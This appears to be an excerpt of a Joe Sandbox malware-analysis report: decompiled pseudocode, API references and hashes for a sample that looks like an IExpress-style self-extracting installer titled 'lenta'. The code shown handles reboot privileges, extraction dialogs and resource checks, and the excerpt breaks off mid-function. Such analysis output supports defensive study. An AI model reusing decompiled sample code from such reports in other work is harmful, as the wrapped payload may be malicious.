                              0x00a75ed4
                              0x00a75ea2
                              0x00a75ea4
                              0x00a75eaf
                              0x00a75eaf
                              0x00000000
                              0x00a75e79
                              0x00a75e7d
                              0x00000000
                              0x00a75e83
                              0x00a75e83
                              0x00a75e83
                              0x00a75e85
                              0x00a75e85
                              0x00a75e8e
                              0x00000000
                              0x00a75e94
                              0x00000000
                              0x00a75e94
                              0x00a75e8e
                              0x00a75e7d
                              0x00a75e77
                              0x00a75e6e
                              0x00a75e65
                              0x00a75e5c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a75dd0
                              0x00a75dd0
                              0x00a75dd0
                              0x00000000
                              0x00a75dd0
                              0x00a75dce
                              0x00a75dca
                              0x00a75dba
                              0x00000000
                              0x00a75d00
                              0x00a75dd9
                              0x00a75e04
                              0x00a761fe
                              0x00a75e0a
                              0x00a75e0c
                              0x00a75e17
                              0x00a75e17
                              0x00a75e04
                              0x00a76200
                              0x00a76200
                              0x00000000

                              APIs
                              • CharNextA.USER32(?,00000000,?,?), ref: 00A75CEE
                              • GetModuleFileNameA.KERNEL32(00A78B3E,00000104,00000000,?,?), ref: 00A75DFC
                              • CharUpperA.USER32(?), ref: 00A75E3E
                              • CharUpperA.USER32(-00000052), ref: 00A75EE1
                              • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A75F6F
                              • CharUpperA.USER32(?), ref: 00A75FA7
                              • CharUpperA.USER32(-0000004E), ref: 00A76008
                              • CharUpperA.USER32(?), ref: 00A760AA
                              • CloseHandle.KERNEL32(00000000,00A71140,00000000,00000040,00000000), ref: 00A761F1
                              • ExitProcess.KERNEL32 ref: 00A761F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                              • String ID: "$"$:$RegServer
                              • API String ID: 1203814774-25366791
                              • Opcode ID: 1050b6835def4a5fabd6c0789a5792fd65f1a22012f0be019a06ce3d187e62eb
                              • Instruction ID: 7b3fa27845451a50cafefffb55b00e20efb18706ad71255f9869bba98ab56e1f
                              • Opcode Fuzzy Hash: 1050b6835def4a5fabd6c0789a5792fd65f1a22012f0be019a06ce3d187e62eb
                              • Instruction Fuzzy Hash: 5BD12471E44E445EDB39CB788C4C7FA3BA5AB56340F58C1AAC48ED6191DAF48EC78B40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 60%
                              			E00A71F90(signed int __ecx, void* __edi, void* __esi) {
                              				signed int _v8;
                              				int _v12;
                              				struct _TOKEN_PRIVILEGES _v24;
                              				void* _v28;
                              				void* __ebx;
                              				signed int _t13;
                              				int _t21;
                              				void* _t25;
                              				int _t28;
                              				signed char _t30;
                              				void* _t38;
                              				void* _t40;
                              				void* _t41;
                              				signed int _t46;
                              
                              				_t41 = __esi;
                              				_t38 = __edi;
                              				_t30 = __ecx;
                              				if((__ecx & 0x00000002) != 0) {
                              					L12:
                              					if((_t30 & 0x00000004) != 0) {
                              						L14:
                              						if( *0xa79a40 != 0) {
                              							_pop(_t30);
                              							_t44 = _t46;
                              							_t13 =  *0xa78004; // 0x74742267
                              							_v8 = _t13 ^ _t46;
                              							_push(_t38);
                              							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                              								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                              								_v24.PrivilegeCount = 1;
                              								_v12 = 2;
                              								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                              								CloseHandle(_v28);
                              								_t41 = _t41;
                              								_push(0);
                              								if(_t21 != 0) {
                              									if(ExitWindowsEx(2, ??) != 0) {
                              										_t25 = 1;
                              									} else {
                              										_t37 = 0x4f7;
                              										goto L3;
                              									}
                              								} else {
                              									_t37 = 0x4f6;
                              									goto L4;
                              								}
                              							} else {
                              								_t37 = 0x4f5;
                              								L3:
                              								_push(0);
                              								L4:
                              								_push(0x10);
                              								_push(0);
                              								_push(0);
                              								E00A744B9(0, _t37);
                              								_t25 = 0;
                              							}
                              							_pop(_t40);
                              							return E00A76CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                              						} else {
                              							_t28 = ExitWindowsEx(2, 0);
                              							goto L16;
                              						}
                              					} else {
                              						_t37 = 0x522;
                              						_t28 = E00A744B9(0, 0x522, 0xa71140, 0, 0x40, 4);
                              						if(_t28 != 6) {
                              							goto L16;
                              						} else {
                              							goto L14;
                              						}
                              					}
                              				} else {
                              					__eax = E00A71EA7(__ecx);
                              					if(__eax != 2) {
                              						L16:
                              						return _t28;
                              					} else {
                              						goto L12;
                              					}
                              				}
                              			}

















                              0x00a71f90
                              0x00a71f90
                              0x00a71f93
                              0x00a71f98
                              0x00a71fa4
                              0x00a71fa7
                              0x00a71fc5
                              0x00a71fcd
                              0x00a71fdb
                              0x00a71ee5
                              0x00a71eea
                              0x00a71ef1
                              0x00a71ef4
                              0x00a71f0c
                              0x00a71f2e
                              0x00a71f3a
                              0x00a71f46
                              0x00a71f4d
                              0x00a71f58
                              0x00a71f60
                              0x00a71f61
                              0x00a71f62
                              0x00a71f75
                              0x00a71f80
                              0x00a71f77
                              0x00a71f77
                              0x00000000
                              0x00a71f77
                              0x00a71f64
                              0x00a71f64
                              0x00000000
                              0x00a71f64
                              0x00a71f0e
                              0x00a71f0e
                              0x00a71f13
                              0x00a71f13
                              0x00a71f14
                              0x00a71f14
                              0x00a71f16
                              0x00a71f17
                              0x00a71f1a
                              0x00a71f1f
                              0x00a71f1f
                              0x00a71f86
                              0x00a71f8f
                              0x00a71fcf
                              0x00a71fd3
                              0x00000000
                              0x00a71fd3
                              0x00a71fa9
                              0x00a71fb4
                              0x00a71fbb
                              0x00a71fc3
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a71fc3
                              0x00a71f9a
                              0x00a71f9a
                              0x00a71fa2
                              0x00a71fd9
                              0x00a71fda
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a71fa2

                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A71EFB
                              • OpenProcessToken.ADVAPI32(00000000), ref: 00A71F02
                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00A71FD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Process$CurrentExitOpenTokenWindows
                              • String ID: SeShutdownPrivilege
                              • API String ID: 2795981589-3733053543
                              • Opcode ID: cbe581605863937d8f78e37d12d2b235cac3454c59985071a8c0284a8d675d40
                              • Instruction ID: db1afff4fd3863c023c7a76f559a97e2c78093999597448e2c2844583a42d552
                              • Opcode Fuzzy Hash: cbe581605863937d8f78e37d12d2b235cac3454c59985071a8c0284a8d675d40
                              • Instruction Fuzzy Hash: C921B471B402057BEB209BE99C4AFBF76F8EBC5B11F10C51AFA0EE6180D77488429261
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A76CF0(struct _EXCEPTION_POINTERS* _a4) {
                              
                              				SetUnhandledExceptionFilter(0);
                              				UnhandledExceptionFilter(_a4);
                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                              			}



                              0x00a76cf7
                              0x00a76d00
                              0x00a76d19

                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A76E26,00A71000), ref: 00A76CF7
                              • UnhandledExceptionFilter.KERNEL32(00A76E26,?,00A76E26,00A71000), ref: 00A76D00
                              • GetCurrentProcess.KERNEL32(C0000409,?,00A76E26,00A71000), ref: 00A76D0B
                              • TerminateProcess.KERNEL32(00000000,?,00A76E26,00A71000), ref: 00A76D12
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                              • String ID:
                              • API String ID: 3231755760-0
                              • Opcode ID: d21ab630a257d9341cdb25e119b49de2390b72c3a1d0a985614891729c2b38ba
                              • Instruction ID: 5041786f5f7f92017fa1684d25197f42196d650719d28b005f300b949747859e
                              • Opcode Fuzzy Hash: d21ab630a257d9341cdb25e119b49de2390b72c3a1d0a985614891729c2b38ba
                              • Instruction Fuzzy Hash: FAD0C932000108BBFB006BE1EC0CA5D3F28EBD8223F84C100F31D82420CA324492CB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E00A73210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                              				void* __edi;
                              				void* _t6;
                              				void* _t10;
                              				int _t20;
                              				int _t21;
                              				int _t23;
                              				char _t24;
                              				long _t25;
                              				int _t27;
                              				int _t30;
                              				void* _t32;
                              				int _t33;
                              				int _t34;
                              				int _t37;
                              				int _t38;
                              				int _t39;
                              				void* _t42;
                              				void* _t46;
                              				CHAR* _t49;
                              				void* _t58;
                              				void* _t63;
                              				struct HWND__* _t64;
                              
                              				_t64 = _a4;
                              				_t6 = _a8 - 0x10;
                              				if(_t6 == 0) {
                              					_push(0);
                              					L38:
                              					EndDialog(_t64, ??);
                              					L39:
                              					__eflags = 1;
                              					return 1;
                              				}
                              				_t42 = 1;
                              				_t10 = _t6 - 0x100;
                              				if(_t10 == 0) {
                              					E00A743D0(_t64, GetDesktopWindow());
                              					SetWindowTextA(_t64, "lenta");
                              					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                              					__eflags =  *0xa79a40 - _t42; // 0x3
                              					if(__eflags == 0) {
                              						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                              					}
                              					L36:
                              					return _t42;
                              				}
                              				if(_t10 == _t42) {
                              					_t20 = _a12 - 1;
                              					__eflags = _t20;
                              					if(_t20 == 0) {
                              						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa791e4, 0x104);
                              						__eflags = _t21;
                              						if(_t21 == 0) {
                              							L32:
                              							_t58 = 0x4bf;
                              							_push(0);
                              							_push(0x10);
                              							_push(0);
                              							_push(0);
                              							L25:
                              							E00A744B9(_t64, _t58);
                              							goto L39;
                              						}
                              						_t49 = 0xa791e4;
                              						do {
                              							_t23 =  *_t49;
                              							_t49 =  &(_t49[1]);
                              							__eflags = _t23;
                              						} while (_t23 != 0);
                              						__eflags = _t49 - 0xa791e5 - 3;
                              						if(_t49 - 0xa791e5 < 3) {
                              							goto L32;
                              						}
                              						_t24 =  *0xa791e5; // 0x3a
                              						__eflags = _t24 - 0x3a;
                              						if(_t24 == 0x3a) {
                              							L21:
                              							_t25 = GetFileAttributesA(0xa791e4);
                              							__eflags = _t25 - 0xffffffff;
                              							if(_t25 != 0xffffffff) {
                              								L26:
                              								E00A7658A(0xa791e4, 0x104, 0xa71140);
                              								_t27 = E00A758C8(0xa791e4);
                              								__eflags = _t27;
                              								if(_t27 != 0) {
                              									__eflags =  *0xa791e4 - 0x5c;
                              									if( *0xa791e4 != 0x5c) {
                              										L30:
                              										_t30 = E00A7597D(0xa791e4, 1, _t64, 1);
                              										__eflags = _t30;
                              										if(_t30 == 0) {
                              											L35:
                              											_t42 = 1;
                              											__eflags = 1;
                              											goto L36;
                              										}
                              										L31:
                              										_t42 = 1;
                              										EndDialog(_t64, 1);
                              										goto L36;
                              									}
                              									__eflags =  *0xa791e5 - 0x5c;
                              									if( *0xa791e5 == 0x5c) {
                              										goto L31;
                              									}
                              									goto L30;
                              								}
                              								_push(0);
                              								_push(0x10);
                              								_push(0);
                              								_push(0);
                              								_t58 = 0x4be;
                              								goto L25;
                              							}
                              							_t32 = E00A744B9(_t64, 0x54a, 0xa791e4, 0, 0x20, 4);
                              							__eflags = _t32 - 6;
                              							if(_t32 != 6) {
                              								goto L35;
                              							}
                              							_t33 = CreateDirectoryA(0xa791e4, 0);
                              							__eflags = _t33;
                              							if(_t33 != 0) {
                              								goto L26;
                              							}
                              							_push(0);
                              							_push(0x10);
                              							_push(0);
                              							_push(0xa791e4);
                              							_t58 = 0x4cb;
                              							goto L25;
                              						}
                              						__eflags =  *0xa791e4 - 0x5c;
                              						if( *0xa791e4 != 0x5c) {
                              							goto L32;
                              						}
                              						__eflags = _t24 - 0x5c;
                              						if(_t24 != 0x5c) {
                              							goto L32;
                              						}
                              						goto L21;
                              					}
                              					_t34 = _t20 - 1;
                              					__eflags = _t34;
                              					if(_t34 == 0) {
                              						EndDialog(_t64, 0);
                              						 *0xa79124 = 0x800704c7;
                              						goto L39;
                              					}
                              					__eflags = _t34 != 0x834;
                              					if(_t34 != 0x834) {
                              						goto L36;
                              					}
                              					_t37 = LoadStringA( *0xa79a3c, 0x3e8, 0xa78598, 0x200);
                              					__eflags = _t37;
                              					if(_t37 != 0) {
                              						_t38 = E00A74224(_t64, _t46, _t46);
                              						__eflags = _t38;
                              						if(_t38 == 0) {
                              							goto L36;
                              						}
                              						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa787a0);
                              						__eflags = _t39;
                              						if(_t39 != 0) {
                              							goto L36;
                              						}
                              						_t63 = 0x4c0;
                              						L9:
                              						E00A744B9(_t64, _t63, 0, 0, 0x10, 0);
                              						_push(0);
                              						goto L38;
                              					}
                              					_t63 = 0x4b1;
                              					goto L9;
                              				}
                              				return 0;
                              			}

























                              0x00a7321b
                              0x00a7321e
                              0x00a73221
                              0x00a7343c
                              0x00a7343e
                              0x00a7343f
                              0x00a73445
                              0x00a73447
                              0x00000000
                              0x00a73447
                              0x00a73229
                              0x00a7322a
                              0x00a7322f
                              0x00a733ec
                              0x00a733f7
                              0x00a73410
                              0x00a73416
                              0x00a7341d
                              0x00a7342d
                              0x00a7342d
                              0x00a73438
                              0x00000000
                              0x00a73438
                              0x00a73237
                              0x00a73243
                              0x00a73243
                              0x00a73246
                              0x00a732ee
                              0x00a732f4
                              0x00a732f6
                              0x00a733d4
                              0x00a733d6
                              0x00a733db
                              0x00a733dc
                              0x00a733de
                              0x00a733df
                              0x00a73370
                              0x00a73372
                              0x00000000
                              0x00a73372
                              0x00a732fc
                              0x00a73301
                              0x00a73301
                              0x00a73303
                              0x00a73304
                              0x00a73304
                              0x00a7330a
                              0x00a7330d
                              0x00000000
                              0x00000000
                              0x00a73313
                              0x00a73318
                              0x00a7331a
                              0x00a73331
                              0x00a73332
                              0x00a7333a
                              0x00a7333d
                              0x00a7337c
                              0x00a73388
                              0x00a7338f
                              0x00a73394
                              0x00a73396
                              0x00a733a4
                              0x00a733ab
                              0x00a733b6
                              0x00a733be
                              0x00a733c3
                              0x00a733c5
                              0x00a73435
                              0x00a73437
                              0x00a73437
                              0x00000000
                              0x00a73437
                              0x00a733c7
                              0x00a733c9
                              0x00a733cc
                              0x00000000
                              0x00a733cc
                              0x00a733ad
                              0x00a733b4
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a733b4
                              0x00a73398
                              0x00a73399
                              0x00a7339b
                              0x00a7339c
                              0x00a7339d
                              0x00000000
                              0x00a7339d
                              0x00a7334c
                              0x00a73351
                              0x00a73354
                              0x00000000
                              0x00000000
                              0x00a7335c
                              0x00a73362
                              0x00a73364
                              0x00000000
                              0x00000000
                              0x00a73366
                              0x00a73367
                              0x00a73369
                              0x00a7336a
                              0x00a7336b
                              0x00000000
                              0x00a7336b
                              0x00a7331c
                              0x00a73323
                              0x00000000
                              0x00000000
                              0x00a73329
                              0x00a7332b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a7332b
                              0x00a7324c
                              0x00a7324c
                              0x00a7324f
                              0x00a732c8
                              0x00a732ce
                              0x00000000
                              0x00a732ce
                              0x00a73251
                              0x00a73256
                              0x00000000
                              0x00000000
                              0x00a73271
                              0x00a73277
                              0x00a73279
                              0x00a73298
                              0x00a7329d
                              0x00a7329f
                              0x00000000
                              0x00000000
                              0x00a732b0
                              0x00a732b6
                              0x00a732b8
                              0x00000000
                              0x00000000
                              0x00a732be
                              0x00a73280
                              0x00a73289
                              0x00a7328e
                              0x00000000
                              0x00a7328e
                              0x00a7327b
                              0x00000000
                              0x00a7327b
                              0x00000000

                              APIs
                              • LoadStringA.USER32(000003E8,00A78598,00000200), ref: 00A73271
                              • GetDesktopWindow.USER32 ref: 00A733E2
                              • SetWindowTextA.USER32(?,lenta), ref: 00A733F7
                              • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A73410
                              • GetDlgItem.USER32(?,00000836), ref: 00A73426
                              • EnableWindow.USER32(00000000), ref: 00A7342D
                              • EndDialog.USER32(?,00000000), ref: 00A7343F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lenta
                              • API String ID: 2418873061-7669773
                              • Opcode ID: 7b6ddd44e6331fd5bd97bc222f5a3b6e47667605436290f48534496ff0b2d5bc
                              • Instruction ID: abc7ce120f8b2eeee0c285a292ac72f3dfeac4957955a9dc95c213459b2e677d
                              • Opcode Fuzzy Hash: 7b6ddd44e6331fd5bd97bc222f5a3b6e47667605436290f48534496ff0b2d5bc
                              • Instruction Fuzzy Hash: C9514C3234024077FF359B755C8CFBF2A5CDB96B52F51C128F54EAA1D1CAA48A42F261
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00A72CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t13;
                              				void* _t20;
                              				void* _t23;
                              				void* _t27;
                              				struct HRSRC__* _t31;
                              				intOrPtr _t33;
                              				void* _t43;
                              				void* _t48;
                              				signed int _t65;
                              				struct HINSTANCE__* _t66;
                              				signed int _t67;
                              
                              				_t13 =  *0xa78004; // 0x74742267
                              				_v8 = _t13 ^ _t67;
                              				_t65 = 0;
                              				_t66 = __ecx;
                              				_t48 = __edx;
                              				 *0xa79a3c = __ecx;
                              				memset(0xa79140, 0, 0x8fc);
                              				memset(0xa78a20, 0, 0x32c);
                              				memset(0xa788c0, 0, 0x104);
                              				 *0xa793ec = 1;
                              				_t20 = E00A7468F("TITLE", 0xa79154, 0x7f);
                              				if(_t20 == 0 || _t20 > 0x80) {
                              					_t64 = 0x4b1;
                              					goto L32;
                              				} else {
                              					_t27 = CreateEventA(0, 1, 1, 0);
                              					 *0xa7858c = _t27;
                              					SetEvent(_t27);
                              					_t64 = 0xa79a34;
                              					if(E00A7468F("EXTRACTOPT", 0xa79a34, 4) != 0) {
                              						if(( *0xa79a34 & 0x000000c0) == 0) {
                              							L12:
                              							 *0xa79120 =  *0xa79120 & _t65;
                              							if(E00A75C9E(_t48, _t48, _t65, _t66) != 0) {
                              								if( *0xa78a3a == 0) {
                              									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                              									if(_t31 != 0) {
                              										_t65 = LoadResource(_t66, _t31);
                              									}
                              									if( *0xa78184 != 0) {
                              										__imp__#17();
                              									}
                              									if( *0xa78a24 == 0) {
                              										_t57 = _t65;
                              										if(E00A736EE(_t65) == 0) {
                              											goto L33;
                              										} else {
                              											_t33 =  *0xa79a40; // 0x3
                              											_t48 = 1;
                              											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                              												if(( *0xa79a34 & 0x00000100) == 0 || ( *0xa78a38 & 0x00000001) != 0 || E00A718A3(_t64, _t66) != 0) {
                              													goto L30;
                              												} else {
                              													_t64 = 0x7d6;
                              													if(E00A76517(_t57, 0x7d6, _t34, E00A719E0, 0x547, 0x83e) != 0x83d) {
                              														goto L33;
                              													} else {
                              														goto L30;
                              													}
                              												}
                              											} else {
                              												L30:
                              												_t23 = _t48;
                              											}
                              										}
                              									} else {
                              										_t23 = 1;
                              									}
                              								} else {
                              									E00A72390(0xa78a3a);
                              									goto L33;
                              								}
                              							} else {
                              								_t64 = 0x520;
                              								L32:
                              								E00A744B9(0, _t64, 0, 0, 0x10, 0);
                              								goto L33;
                              							}
                              						} else {
                              							_t64 =  &_v268;
                              							if(E00A7468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                              								goto L3;
                              							} else {
                              								_t43 = CreateMutexA(0, 1,  &_v268);
                              								 *0xa78588 = _t43;
                              								if(_t43 == 0 || GetLastError() != 0xb7) {
                              									goto L12;
                              								} else {
                              									if(( *0xa79a34 & 0x00000080) == 0) {
                              										_t64 = 0x524;
                              										if(E00A744B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                              											goto L12;
                              										} else {
                              											goto L11;
                              										}
                              									} else {
                              										_t64 = 0x54b;
                              										E00A744B9(0, 0x54b, "lenta", 0, 0x10, 0);
                              										L11:
                              										CloseHandle( *0xa78588);
                              										 *0xa79124 = 0x800700b7;
                              										goto L33;
                              									}
                              								}
                              							}
                              						}
                              					} else {
                              						L3:
                              						_t64 = 0x4b1;
                              						E00A744B9(0, 0x4b1, 0, 0, 0x10, 0);
                              						 *0xa79124 = 0x80070714;
                              						L33:
                              						_t23 = 0;
                              					}
                              				}
                              				return E00A76CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                              			}



















                              0x00a72cb5
                              0x00a72cbc
                              0x00a72cc7
                              0x00a72cc9
                              0x00a72cd1
                              0x00a72cd3
                              0x00a72cd9
                              0x00a72ce9
                              0x00a72cf9
                              0x00a72d0e
                              0x00a72d15
                              0x00a72d1c
                              0x00a72ef3
                              0x00000000
                              0x00a72d2d
                              0x00a72d34
                              0x00a72d3b
                              0x00a72d40
                              0x00a72d48
                              0x00a72d59
                              0x00a72d84
                              0x00a72e1f
                              0x00a72e1f
                              0x00a72e2e
                              0x00a72e41
                              0x00a72e5a
                              0x00a72e62
                              0x00a72e6c
                              0x00a72e6c
                              0x00a72e75
                              0x00a72e77
                              0x00a72e77
                              0x00a72e84
                              0x00a72e8b
                              0x00a72e94
                              0x00000000
                              0x00a72e96
                              0x00a72e96
                              0x00a72e9e
                              0x00a72ea2
                              0x00a72eba
                              0x00000000
                              0x00a72ece
                              0x00a72ede
                              0x00a72eed
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a72eed
                              0x00a72eef
                              0x00a72eef
                              0x00a72eef
                              0x00a72eef
                              0x00a72ea2
                              0x00a72e86
                              0x00a72e88
                              0x00a72e88
                              0x00a72e43
                              0x00a72e48
                              0x00000000
                              0x00a72e48
                              0x00a72e30
                              0x00a72e30
                              0x00a72ef8
                              0x00a72f01
                              0x00000000
                              0x00a72f01
                              0x00a72d8a
                              0x00a72d8f
                              0x00a72da1
                              0x00000000
                              0x00a72da3
                              0x00a72dae
                              0x00a72db4
                              0x00a72dbb
                              0x00000000
                              0x00a72dca
                              0x00a72dd3
                              0x00a72df5
                              0x00a72e02
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a72dd5
                              0x00a72dde
                              0x00a72de3
                              0x00a72e04
                              0x00a72e0a
                              0x00a72e10
                              0x00000000
                              0x00a72e10
                              0x00a72dd3
                              0x00a72dbb
                              0x00a72da1
                              0x00a72d5b
                              0x00a72d5b
                              0x00a72d5d
                              0x00a72d69
                              0x00a72d6e
                              0x00a72f06
                              0x00a72f06
                              0x00a72f06
                              0x00a72d59
                              0x00a72f18

                              APIs
                              • memset.MSVCRT ref: 00A72CD9
                              • memset.MSVCRT ref: 00A72CE9
                              • memset.MSVCRT ref: 00A72CF9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                                • Part of subcall function 00A7468F: SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                                • Part of subcall function 00A7468F: LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                                • Part of subcall function 00A7468F: LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                                • Part of subcall function 00A7468F: memcpy_s.MSVCRT ref: 00A746E5
                                • Part of subcall function 00A7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A72D34
                              • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A72D40
                              • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A72DAE
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A72DBD
                              • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A72E0A
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                              • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                              • API String ID: 1002816675-2993962200
                              • Opcode ID: 16dc41537086badf59ec882909998913935c528488d9a6055d1373aa0cdb489d
                              • Instruction ID: 8119e3263a5865886b95d89f7e2499350b03588a0d8579584fe4bfb4087836fd
                              • Opcode Fuzzy Hash: 16dc41537086badf59ec882909998913935c528488d9a6055d1373aa0cdb489d
                              • Instruction Fuzzy Hash: 0F51D2707403016BE760ABA49D4AB7B3AACEB95740F40C43AF94DD51E1DBB88C83C765
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 81%
                              			E00A734F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                              				void* _t9;
                              				void* _t12;
                              				void* _t13;
                              				void* _t17;
                              				void* _t23;
                              				void* _t25;
                              				struct HWND__* _t35;
                              				struct HWND__* _t38;
                              				void* _t39;
                              
                              				_t9 = _a8 - 0x10;
                              				if(_t9 == 0) {
                              					__eflags = 1;
                              					L19:
                              					_push(0);
                              					 *0xa791d8 = 1;
                              					L20:
                              					_push(_a4);
                              					L21:
                              					EndDialog();
                              					L22:
                              					return 1;
                              				}
                              				_push(1);
                              				_pop(1);
                              				_t12 = _t9 - 0xf2;
                              				if(_t12 == 0) {
                              					__eflags = _a12 - 0x1b;
